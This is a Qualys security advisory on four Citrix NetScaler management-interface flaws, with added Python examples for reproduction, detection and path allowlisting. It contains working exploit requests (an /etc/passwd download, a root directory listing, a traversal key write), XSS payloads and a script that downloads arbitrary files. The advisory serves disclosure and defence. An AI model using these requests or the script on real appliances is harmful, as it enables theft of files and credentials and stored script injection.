Qualys Security Advisory 


Citrix Netscaler Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: Citrix Netscaler VPX series 

SYSTEMS TESTED: 
Citrix NetScaler VPX 1000, NetScaler NS10.5: Build 56.22.nc 
Citrix NetScaler VPX 200, NetScaler NS11.0: Build 68.12.nc 


Reference: https://www.citrix.com/NetScaler/ 


Note: Exploitation of the vulnerabilities below requires access to the management interface. 


VULNERABILITY DETAILS: 


CVE-2018-6808: Arbitrary File Download 


NetScaler allows a user with the appropriate permissions to create backup, certificate and key files. The files 
are stored in different directories depending on their type; for example, SSL certificates and keys are stored 
in /nsconfig/ssl/ and backup files in /var/. A user who is permitted to download such files can download 
arbitrary files from the appliance, because the download request carries the file path and the path is not 
restricted. 


CVSS: AV:N/AC:L/Au:N/C:C/I:N/A:N 


Steps to reproduce: 


1. Navigate to the System > Backup tab. 

2. Start an intercepting proxy and enable intercept mode so that the requests can be modified. 

3. Click "Download" on one of the available backups. 
A valid request looks like this: 
http://192.168.146.130/rapi/filedownload?filter=path:%2Fvar%2Fns_sys_backup%2Ftest.tgz 


4. Changing the filter=path value to any other file, such as passwd or master.pwd, downloads that 
file. 


See the snapshot below, which shows the above request being used to download /etc/passwd. 


Request: 

    GET /rapi/filedownload?filter=path:%2Fetc%2Fpasswd&rand_key=1349737858.1492859562876677 HTTP/1.1 
    Host: 192.168.146.130 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
    Accept-Language: en-US,en;q=0.5 
    Referer: http://192.168.146.130/menu/neo 
    Cookie: startupapp=neo; is_cisco_platform=0; SESSID=eaf4e576103de4226ebacfcOc4ledsds; rdx_pagination_size=25%20Per%20Page 
    DNT: 1 
    Connection: close 
    Upgrade-Insecure-Requests: 1 

Response: 

    HTTP/1.1 200 OK 
    Date: Sat, 22 Apr 2017 11:25:12 GMT 
    Server: Apache 
    Expires: Thu, 19 Nov 1981 08:52:00 GMT 
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
    Pragma: no-cache 
    Content-Disposition: attachment; filename="passwd" 
    Content-Length: 465 
    Connection: close 
    Content-Type: text/plain 

    (body: the appliance's /etc/passwd; the left-hand side of the capture is cut off) 
    [...]:Charlie &:/root:/usr/bin/bash 
    [...]:Netscaler Root:/root:/netscaler/nssh 
    [...]:Owner of many system processes:/root:/nonexistent 
    [...]:System &:/nonexistent:/nonexistent 
    [...]:Binaries Commands and Source,,,:/:/nonexistent 
    [...]:65534:65534:Unprivileged user:/nonexistent:/nonexistent 
    [...]:65533:65533:SSHD User:/nonexistent:/nonexistent 
    nsmonitor:*:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/nonexistent 
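The procedure above as a script, added here as an example (it is not code from the Qualys advisory or from Citrix): build_download_url reproduces the modified step-4 request for any path, download_file fetches it with the SESSID cookie seen in the capture, and the second half parses access-log lines and reports every successful /rapi/filedownload call whose path, after ../ normalisation, is not under /var/ns_sys_backup. The management address, the session cookie and the Apache combined-log layout of the sample lines are assumptions, and the sample log lines are constructed, not taken from an appliance.

```python
"""CVE-2018-6808: reproduce the modified /rapi/filedownload request from the advisory
and flag access-log entries where filter=path escapes the backup directory.
Added example, not Qualys or Citrix code. The management address, the SESSID cookie
and the Apache combined-log layout of the sample lines are assumptions."""
import posixpath
import re
import urllib.parse
import urllib.request

BACKUP_DIR = "/var/ns_sys_backup"   # the UI's own download requests point here


def build_download_url(host, path, rand_key=None, scheme="http"):
    """Step 4 of the advisory: the UI sends filter=path:<percent-encoded path>; the
    server does not check it, so any absolute path can be substituted."""
    query = "filter=path:" + urllib.parse.quote(path, safe="")
    if rand_key is not None:            # cache-buster the UI appends; optional
        query += "&rand_key=" + rand_key
    return f"{scheme}://{host}/rapi/filedownload?{query}"


def download_file(host, sessid, path, timeout=10):
    """Fetch `path` with an authenticated management session (the SESSID cookie seen
    in the capture). Makes a network call; use only against systems you own."""
    req = urllib.request.Request(build_download_url(host, path))
    req.add_header("Cookie", "SESSID=" + sessid)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


# --- detection side -----------------------------------------------------------

# Constructed access-log lines (not from the advisory): a legitimate backup
# download, the /etc/passwd request from the advisory, a ../ escape, and noise.
SAMPLE_LOG = """\
192.168.146.1 - - [22/Apr/2017:11:24:50 +0000] "GET /rapi/filedownload?filter=path:%2Fvar%2Fns_sys_backup%2Ftest.tgz HTTP/1.1" 200 10240
192.168.146.1 - - [22/Apr/2017:11:25:12 +0000] "GET /rapi/filedownload?filter=path:%2Fetc%2Fpasswd&rand_key=1349737858.1492859562876677 HTTP/1.1" 200 465
192.168.146.1 - - [22/Apr/2017:11:26:03 +0000] "GET /rapi/filedownload?filter=path:%2Fvar%2Fns_sys_backup%2F..%2F..%2Fetc%2Fmaster.passwd HTTP/1.1" 200 944
192.168.146.1 - - [22/Apr/2017:11:27:40 +0000] "GET /menu/neo HTTP/1.1" 200 5120
"""

# client, [timestamp], "METHOD url HTTP/x.y", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def requested_path(url):
    """Decoded value of filter=path:<...> from a request URL, or None."""
    query = urllib.parse.urlsplit(url).query
    for value in urllib.parse.parse_qs(query).get("filter", []):
        if value.startswith("path:"):
            return value[len("path:"):]
    return None


def outside_backup_dir(path):
    """True when the normalised path is not inside BACKUP_DIR; normpath collapses
    ../ so that /var/ns_sys_backup/../../etc/passwd is caught as /etc/passwd."""
    norm = posixpath.normpath(path)
    return not (norm == BACKUP_DIR or norm.startswith(BACKUP_DIR + "/"))


def find_arbitrary_downloads(log_text):
    """(client, timestamp, raw path) for every successful filedownload request
    whose path leaves the backup directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, url, status = m.groups()
        if method != "GET" or not url.startswith("/rapi/filedownload?") or status != "200":
            continue
        path = requested_path(url)
        if path is not None and outside_backup_dir(path):
            hits.append((client, ts, path))
    return hits


if __name__ == "__main__":
    print(build_download_url("192.168.146.130", "/etc/passwd"))
    for client, ts, path in find_arbitrary_downloads(SAMPLE_LOG):
        print(f"{ts} {client} downloaded {path}")
```

The detector keys on the raw path so the analyst sees exactly what was requested; the normalised form is only used for the decision. A path that stays inside /var/ns_sys_backup but points at another user's backup is not flagged here, since the advisory's issue is escaping the directory, not access between backups.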


CVE-2018-6809: Improper Access Restriction in the File System Access API 


NetScaler provides a NITRO API to list the files in a given directory; the management UI calls it to list 
/nsconfig/ssl, /var, etc. The API does not restrict which directories may be accessed, so a user with the 
"show system file" command permission can list any directory on the appliance. 


CVSS: AV:N/AC:L/Au:S/C:C/I:N/A:N 


Steps to reproduce: 


1. Log in with a user account that has the "show system file" permission and request the URL below. 
This lists all directories and files in "/": 


http://192.168.146.130/nitro/v1/config/systemfile?args=fileLocation:%2F&pageno=1&pagesize=100 


Below is the snapshot of the request and its output (partly cut off in the capture): 

Request: 

    GET /nitro/v1/config/systemfile?args=fileLocation:%2F&pageno=1&pagesize=100 HTTP/1.1 
    Host: 192.168.146.130 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
    Accept-Language: en-US,en;q=0.5 
    Cookie: [...]; is_cisco_platform=0; SESSID=31b4b8d3279ba7e08855ba3962ab433e; rdx_pagination_size=25%20Per%20Page 

Response: 

    Date: [...] Apr 2017 20:38:10 GMT 
    Expires: Thu, 19 Nov 1981 08:52:00 GMT 
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
    Connection: close 
    Content-Type: application/json; charset=utf-8 

    (JSON body, abridged: one object per entry of "/", each with filename, filelocation, 
    fileaccesstime, filemodifiedtime and filemode; the dates are in April 2017) 
    { "errorcode": 0, "message": "...", "systemfile": [ 
        { "filename": "flash", "filelocation": "\/", "fileaccesstime": "...", 
          "filemodifiedtime": "...", "filemode": [ "DIRECTORY" ] }, 
        ..., 
        { "filename": "var", "filelocation": "\/", "fileaccesstime": "...", 
          "filemodifiedtime": "...", "filemode": [ "DIRECTORY" ] }, 
        ... ] } 


CVE-2018-6811: Multiple Cross-site Scripting 


NetScaler does not HTML-encode user-supplied data before rendering it in the management UI, which allows a 
user with permission to modify the relevant configuration objects to inject arbitrary HTML or script into UI 
fields. 


CVSS: AV:N/AC:L/Au:S/C:C/I:N/A:N 
The following UI components were found to be affected by cross-site scripting during the assessment: 


1. Host Name 

Snapshot: Configuration > System, "Host Name, DNS IP Address, and Time Zone" (DNS IP Address 192.168.146.1, 
Time Zone CoordinatedUniversalTime) with the host name set to a value ending in <img src="x" onerror="alert(1)">. 
The browser inspector shows the value placed in the page unencoded, so the img element and its onerror 
handler are live: 

    <div class="global_settings_label global_settings_small_label">Host Name</div> 
    <div class="global_settings_field"> 
        zorx 
        <img src="x" onerror="alert(1)"> 
    </div> 


2. Certificate Key Filename and Certificate Filename 

Request: 

    POST /nitro/v1/config/sslrsakey HTTP/1.1 
    Host: 192.168.146.130 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
    Accept: */* 
    Accept-Language: en-US,en;q=0.5 
    Content-Type: application/x-www-form-urlencoded 
    If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT 
    NITRO_WEB_APPLICATION: true 
    rand_key: [...] 
    Referer: http://192.168.146.130/menu/neo 
    Content-Length: [...] 
    Cookie: [...] 
    Authorization: Basic dGVzdDp0ZXN0 
    Connection: close 

    [...]t={"params":{"action":"create","warning":"YES"},"sslrsakey":{"keyfile":"res<script>alert(1)","bits":"1233","exponent":"3","keyform":"PEM"}} 

Response: 

    HTTP/1.0 201 Created 
    Date: Sat, 22 Apr 2017 08:37:05 GMT 
    Server: Apache 
    Expires: Thu, 19 Nov 1981 08:52:00 GMT 
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
    Pragma: no-cache 
    Content-Length: 57 
    Connection: close 
    Content-Type: application/json; charset=utf-8 

    { "errorcode": 0, "message": "Done", "severity": "NONE" } 


3. Test Root Certificate 

Snapshot: "Create and Install Test Certificate" dialog with 
    Certificate File Name: thsting_root 
    Fully Qualified Domain Name: bbbb<script>alert(1) 
    Country: UNITED STATES 
The resulting page (an XHTML 1.0 Strict document) contains the injected tag and the browser shows the 
alert dialog. 


4. OCSP Responder 

Snapshot: "Create OCSP Responder" dialog with 
    Name: test<img src=x onerror=alert(1)> 
    URL: http://localhost 
    Cache: unchecked 
    Time-out: 1 minutes 
    Request Batching: Batching Delay 1 
    Response Verification: Trust Responses unchecked, Produced At Time Skew 300 seconds, 
    Signing Certificate (none selected), Request Time-out 2000 milliseconds 
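A check for the stored form of this issue, plus the output-encoding fix, as an added example (not Qualys or Citrix code): find_stored_payloads walks a NITRO GET response of the shape shown in this advisory and reports every string attribute that contains a tag opener, an on* event handler or a javascript: URL, and render_field produces the Host Name DOM fragment from the inspector snapshot in item 1 with the value HTML-encoded. The sample NITRO objects are constructed to carry the advisory's payloads; apart from sslrsakey/keyfile, which appears in the capture above, the resource and attribute names are assumptions.

```python
"""CVE-2018-6811: find NetScaler configuration values that already carry HTML or
script (the stored payloads from the advisory's affected UI fields) and render a UI
field with output encoding so such values display as text. Added example, not Qualys
or Citrix code. The NITRO objects below are constructed to match the response shape
seen in the advisory (errorcode/message/severity plus a list of objects); resource
and attribute names other than sslrsakey/keyfile are assumptions."""
import html
import re

# Loose signature for markup a browser would interpret if echoed unencoded: a tag
# opener, an on* event-handler attribute, or a javascript: URL.
MARKUP_RE = re.compile(r"<\s*/?[a-z!]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)

# Constructed NITRO GET responses (not captured from an appliance). The first three
# hold the advisory's Host Name, RSA key file name and OCSP responder name payloads;
# the fourth is a clean object so the scanner has something to ignore.
SAMPLE_NITRO = [
    {"errorcode": 0, "message": "Done", "severity": "NONE",
     "nshostname": [{"hostname": 'zorx<img src="x" onerror="alert(1)">'}]},
    {"errorcode": 0, "message": "Done", "severity": "NONE",
     "sslrsakey": [{"keyfile": "res<script>alert(1)", "bits": "1233"}]},
    {"errorcode": 0, "message": "Done", "severity": "NONE",
     "sslocspresponder": [{"name": "test<img src=x onerror=alert(1)>",
                           "url": "http://localhost"}]},
    {"errorcode": 0, "message": "Done", "severity": "NONE",
     "sslcertkey": [{"certkey": "ns-server-certificate",
                     "cert": "ns-server.cert", "key": "ns-server.key"}]},
]


def find_stored_payloads(nitro_response):
    """(resource, attribute, value) for every string attribute in a NITRO response
    that matches MARKUP_RE. Scalar top-level keys (errorcode, message, severity)
    are skipped; each list-valued key is treated as a resource."""
    findings = []
    for resource, objects in nitro_response.items():
        if not isinstance(objects, list):
            continue
        for obj in objects:
            for attr, value in obj.items():
                if isinstance(value, str) and MARKUP_RE.search(value):
                    findings.append((resource, attr, value))
    return findings


def scan_config(responses):
    """Run find_stored_payloads over several NITRO responses, one per resource."""
    return [f for r in responses for f in find_stored_payloads(r)]


def render_field(label, value):
    """The DOM fragment from the advisory's Host Name inspector capture, produced
    with the value HTML-encoded: <, >, &, " and ' become entities, so an injected
    <img onerror=...> is shown literally instead of being parsed as an element."""
    return ('<div class="global_settings_label global_settings_small_label">{}</div>'
            '<div class="global_settings_field">{}</div>'
            ).format(html.escape(label, quote=True), html.escape(value, quote=True))


def render_field_unsafe(label, value):
    """Same fragment without encoding, i.e. what the advisory observed; kept only
    so the two outputs can be compared side by side."""
    return ('<div class="global_settings_label global_settings_small_label">{}</div>'
            '<div class="global_settings_field">{}</div>').format(label, value)


if __name__ == "__main__":
    for resource, attr, value in scan_config(SAMPLE_NITRO):
        print(f"{resource}.{attr}: {value!r}")
    print(render_field("Host Name", 'zorx<img src="x" onerror="alert(1)">'))
```

Encoding at the point of output is the fix that covers all four components at once; an input allowlist on object names is a useful second layer, but on its own it leaves every value that was stored before the filter was added still rendering as markup, which is what the scanner is for.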


CVE-2018-6810: Improper Access Restriction / Directory Traversal 


NetScaler allows a user to create certificate and key files via the certificate creation wizard. By default 
the files are stored in /nsconfig/ssl/. The request that creates the RSA key and certificate is not properly 
restricted, so by using directory traversal in the file name an RSA key or certificate can be written outside 
the intended /nsconfig/ssl directory. 


CVSS: AV:N/AC:L/Au:S/C:N/I:P/A:N 
URL: 
http://192.168.146.130/nitro/v1/config/sslrsakey 


The snapshot below shows that, using directory traversal, it was possible to create a file in the /etc 
directory. 


Target: http://192.168.146.130 

Request (the capture is partly cut off): 

    POST /nitro/v1/config/sslrsakey HTTP/1.1 
    Host: 192.168.146.130 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 
    Content-Type: application/x-www-form-urlencoded 
    If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT 
    [...] 

    [...]{"params":{"action":"create","warning":"YES"},"sslrsakey":{"keyfile":"./certfolder/../../../..[...] 

Response: 

    HTTP/1.0 201 Created 
    [...] 
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
    [...] 

    { "errorcode": 0, [...] "severity": "NONE" } 

A PuTTY session to 192.168.146.130 (screenshot not reproduced here) then shows the created key file in /etc. 
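The allowlist check that the three path issues in this advisory are missing (CVE-2018-6808 filter=path, CVE-2018-6809 fileLocation and CVE-2018-6810 keyfile), as an added example that is not Citrix code: each parameter is percent-decoded, a relative value is anchored to its intended directory, the result is normalised with posixpath.normpath, and it is accepted only if it lies under an allowed root. The allowed roots are the intended locations named in this advisory and the function names are illustrative.

```python
"""Server-side path allowlisting for the three user-controlled paths in this advisory:
filter=path on /rapi/filedownload (CVE-2018-6808), fileLocation on
/nitro/v1/config/systemfile (CVE-2018-6809) and keyfile on /nitro/v1/config/sslrsakey
(CVE-2018-6810). Added example, not Citrix code: the allowed roots are the intended
locations the advisory names (an assumption that these are the only ones needed) and
the function names are illustrative."""
import posixpath
import urllib.parse

ALLOWED_ROOTS = {
    "filedownload": ["/var/ns_sys_backup", "/nsconfig/ssl"],  # backups, certs/keys
    "systemfile": ["/nsconfig/ssl", "/var"],                  # what the UI lists
    "sslrsakey": ["/nsconfig/ssl"],                           # default key location
}


class PathRejected(ValueError):
    """Raised when a user-supplied path resolves outside its allowed root(s)."""


def canonicalize(user_path, base):
    """Percent-decode twice (so %252e%252e%2f cannot pass as literal text), refuse
    NUL bytes, anchor relative input to `base`, and collapse . and .. with
    posixpath.normpath. Symlinks are not resolved here; on the appliance itself
    os.path.realpath would be applied on top of this."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(user_path))
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    if not decoded.startswith("/"):
        decoded = posixpath.join(base, decoded)
    return posixpath.normpath(decoded)


def enforce_root(user_path, roots, base):
    """Return the canonical path if it lies under one of `roots`, else raise.
    The separator is appended before the prefix test so that /nsconfig/ssl2/x is
    not accepted as being under /nsconfig/ssl. Roots must not be "/" itself."""
    canon = canonicalize(user_path, base)
    for root in roots:
        root = root.rstrip("/")
        if canon == root or canon.startswith(root + "/"):
            return canon
    raise PathRejected(f"{user_path!r} resolves to {canon}, outside {roots}")


def check_filedownload(filter_value):
    """filter=path:<path> as sent by System > Backup > Download."""
    prefix, sep, path = filter_value.partition(":")
    if prefix != "path" or not sep:
        raise PathRejected("expected filter=path:<path>")
    return enforce_root(path, ALLOWED_ROOTS["filedownload"], base="/var/ns_sys_backup")


def check_systemfile(args_value):
    """args=fileLocation:<directory> as sent when the UI lists /nsconfig/ssl or /var.
    fileLocation:%2F (the advisory's request) resolves to "/" and is rejected."""
    key, sep, directory = args_value.partition(":")
    if key != "fileLocation" or not sep:
        raise PathRejected("expected args=fileLocation:<directory>")
    return enforce_root(directory, ALLOWED_ROOTS["systemfile"], base="/var")


def check_sslrsakey(keyfile):
    """keyfile from the sslrsakey create action; a relative name is anchored to
    /nsconfig/ssl, so ./certfolder/../../../../etc/x resolves to /etc/x and fails."""
    return enforce_root(keyfile, ALLOWED_ROOTS["sslrsakey"], base="/nsconfig/ssl")


if __name__ == "__main__":
    for fn, arg in [(check_filedownload, "path:%2Fvar%2Fns_sys_backup%2Ftest.tgz"),
                    (check_filedownload, "path:%2Fetc%2Fpasswd"),
                    (check_systemfile, "fileLocation:%2F"),
                    (check_sslrsakey, "./certfolder/../../../../etc/evil.key")]:
        try:
            print("allowed ", fn(arg))
        except PathRejected as exc:
            print("rejected", exc)
```

The check is deliberately done on the canonical string rather than by testing the filesystem, so it behaves the same whether or not the target exists; the one thing string normalisation cannot see is a symlink inside an allowed root pointing elsewhere, which is why realpath belongs in the real implementation as well.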


CREDITS: 


The discovery and documentation of these vulnerabilities was conducted by the Qualys Application Security and 
Research Team (QUASAR). 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to quasar@qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2018 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


